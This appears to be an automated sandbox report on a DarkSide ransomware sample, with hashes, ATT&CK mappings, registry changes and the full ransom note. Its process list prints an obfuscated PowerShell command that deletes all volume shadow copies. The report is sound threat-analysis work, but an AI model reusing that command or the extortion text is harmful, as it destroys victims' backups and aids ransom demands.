darkside | 0f808fd3ecf9d722aafeee46b57aad4d07f39c98be6f6148be979ed470cf0a99

Resubmissions

27-01-2024 19:37

240127-yb5pksafd3 10

27-01-2024 19:36

240127-ybqwesafc2 10

12-05-2021 15:56

210512-db4t7vmwas 10

Analysis

max time kernel
117s
max time network
122s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
27-01-2024 19:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Size

59KB
MD5

5ff75d33080bb97a8e6b54875c221777
SHA1

810d6c70a96584486867cedde111a1087ed1ebe7
SHA256

6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff
SHA512

a6b87ddcaa797a4d8abc06a786a7186fe43eef5e3291402f81b95a180b7fb746f88cd0f408a089deb5321ecf0d2ac3cca479fdc1f782771749df0ac5a082ac00
SSDEEP

768:9jjV7Iax7F3DS4/S9QCuUSbVtdNcxGV1ylMRY23W5:vx7Fu4/irrUDTV1ylMqZ5

Score

10^/10

darkside ransomware spyware stealer

Malware Config

Extracted

Path

C:\Users\Admin\README.21af4d10.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/45NAQ3FNBX002JPHBAIKB97JVVABJQHTM2HO7XOZRXTEH98CRPXYX09X7VUH0F0W When you open our website, put the following data in the input form: Key: aB8lE86K6bt2yphn16ULYEWUkQgiDkVDBHvQuveSHbkkccXcFdx82fYYL2wEuCLtUlSIpghfBnR1iHFog7qrxDKEfU1MQE8uiUe0CjmMqYp429q5QWYrTRUEJV1UevaixL9cMAeVhTiFRe0PHhthK2V8MfjrySgetDXg40JSiHOZHOstlUnOpJpS6CGn9r9P96kf7j5EFu5dIymVAOfFOxkPx8iG9JDaEHm3hEkCGnII4XNwLbykXoVctE8r6OzBrnKNcLvkQTDMwFQh29kecXcnNniHRXVYNDy2SY49GY58TBuNA6MtaqHht98G9qRjFNAYKdEDX5G6IimaqgNF3QCsOiDko91l70T6rcrVpWNrSdGw4p9tnOyIXUfrUVZFeYManOWT8aqu0qTi2C69L8w1RzezAczWJiwIrt3zfkTLqHKotNih0ebqTia8uUcsHbn6u0z2v3LFDyasrZdNvlKq1rmZmljdEDt0jakl9ygQwOEnd8T7gyygbMUwiF7Nhj8UlGP9o1h2L94qObqhQZGKJFH8DuPbQnf9OczD9cyX0uJTJT5iuiu !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidfqzcuhtk2.onion/45NAQ3FNBX002JPHBAIKB97JVVABJQHTM2HO7XOZRXTEH98CRPXYX09X7VUH0F0W

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside
Renames multiple (163) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\21af4d10.BMP"	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\21af4d10.BMP"	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe

pid process

2384 6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe

pid	process
2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe

Modifies Control Panel 1 IoCs

evasion

Processes:

6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Control Panel\Desktop\WallpaperStyle = "10"	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe

Modifies registry class 5 IoCs

Processes:

6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.21af4d10	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.21af4d10\ = "21af4d10"	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\21af4d10\DefaultIcon	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\21af4d10	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\21af4d10\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\21af4d10.ico"	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe

pid	process
2736	powershell.exe
2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exepowershell.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Token: SeSecurityPrivilege	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Token: SeTakeOwnershipPrivilege	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Token: SeLoadDriverPrivilege	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Token: SeSystemProfilePrivilege	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Token: SeSystemtimePrivilege	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Token: SeProfSingleProcessPrivilege	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Token: SeIncBasePriorityPrivilege	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Token: SeCreatePagefilePrivilege	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Token: SeBackupPrivilege	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Token: SeRestorePrivilege	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Token: SeShutdownPrivilege	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Token: SeDebugPrivilege	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Token: SeSystemEnvironmentPrivilege	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Token: SeRemoteShutdownPrivilege	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Token: SeUndockPrivilege	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Token: SeManageVolumePrivilege	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Token: 33	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Token: 34	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Token: 35	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeBackupPrivilege	2820	vssvc.exe
Token: SeRestorePrivilege	2820	vssvc.exe
Token: SeAuditPrivilege	2820	vssvc.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe

description	pid	process	target process
PID 2384 wrote to memory of 2736	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe	powershell.exe
PID 2384 wrote to memory of 2736	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe	powershell.exe
PID 2384 wrote to memory of 2736	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe	powershell.exe
PID 2384 wrote to memory of 2736	2384	6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe	powershell.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
"C:\Users\Admin\AppData\Local\Temp\6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe"
1⤵
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2736

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2820

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Defacement

T1491

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
35KB

MD5
421f8417339422f9b81c008780731021

SHA1
1d5139beca4d010b3fdc17d43afefd4fb0b834f1

SHA256
a59cc4526ea3e973051aaeb0ac2d2a4791db4e84d04d86fcf7e48ef887a8173f

SHA512
59e6911b15aca8a2d29fa4c1f8ee7fa8f3b7b20df6f56ce96fe67fe28165924f21c371784ed7db950a170b3893c32a65c5168e8d75fc5dfdefa1fbf484540cff

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar56DC.tmp
Filesize
67KB

MD5
1286b30f4460efd4841a17ab619af18c

SHA1
35fd12cb627b2db9b69737ca203cbc2fd375a26d

SHA256
b10467af5824e7f35c1010d2051a4fdef847ba0b7e1b9056902823528dbc3f6c

SHA512
dd1916ad3d6a7b5401dc6819f37feb383f35ae8f689e151b9b27e02e9306b80f5dfd7b3a69215b7186b43a94424efd4eea17eeb9fd64538eb076d0743d114892

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
926308f6a94913ee5175c8e29882e146

SHA1
ac77f11806c218599facd53a760cc9032177295e

SHA256
ad922f6fec41a653dd3841b1a12e37c1e4d3c958ecb2ee04c6589b149bd2ee9c

SHA512
85f475bc68175b49bb247aff94905cb5e99faa5cca4669c321ae9a0965e8f312dbef5cad372c7c7fcfe132d1f2d54d1c7fa4bbecdecc14e7523b8a4a9c1d037c

Download Submit
C:\Users\Admin\README.21af4d10.TXT
Filesize
1KB

MD5
29adbb559c7cf5a71f3217726f04577f

SHA1
4efb812b9e9f341b4272d4beb6c716e79be5fd91

SHA256
725a61a2c9301d08ef5510f12410d1ab34b3fa474194b1c45be06d4443248dcd

SHA512
1d807ddbf3b93954911b4b9489280ac138d2aa9717339d051d5f117cbc35e59b1ef6aa2daab7bbec6867a95168668d659709fc50e92c5cb8a6db20912c8120d4

Download Submit
memory/2736-23-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2736-21-0x000007FEF4830000-0x000007FEF51CD000-memory.dmp

Filesize
9.6MB

Download
memory/2736-19-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/2736-18-0x000007FEF4830000-0x000007FEF51CD000-memory.dmp

Filesize
9.6MB

Download
memory/2736-25-0x000007FEF4830000-0x000007FEF51CD000-memory.dmp

Filesize
9.6MB

Download
memory/2736-22-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2736-17-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/2736-24-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2736-20-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download